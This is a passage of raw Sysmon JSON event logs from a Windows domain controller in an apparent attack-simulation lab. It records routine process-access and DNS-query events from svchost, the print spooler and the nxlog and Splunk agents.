C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:16.364\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:16.364","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:17.366\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:17.366","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2983,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.317\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nProcessId: 2932\r\nQueryName: WIN-DC-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.317","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","QueryName":"WIN-DC-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 06:51:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2984,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.428\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nProcessId: 2932\r\nQueryName: WIN-DC-8400769\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.428","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","QueryName":"WIN-DC-8400769","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 06:51:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2985,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.429\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nProcessId: 2932\r\nQueryName: WIN-DC-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;\r\nImage: C:\\Windows\\System32\\spoolsv.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.429","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","QueryName":"WIN-DC-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;","Image":"C:\\Windows\\System32\\spoolsv.exe","EventReceivedTime":"2020-08-01 06:51:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:18.368\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:18.368","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:19.369\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:19.369","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:20.371\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 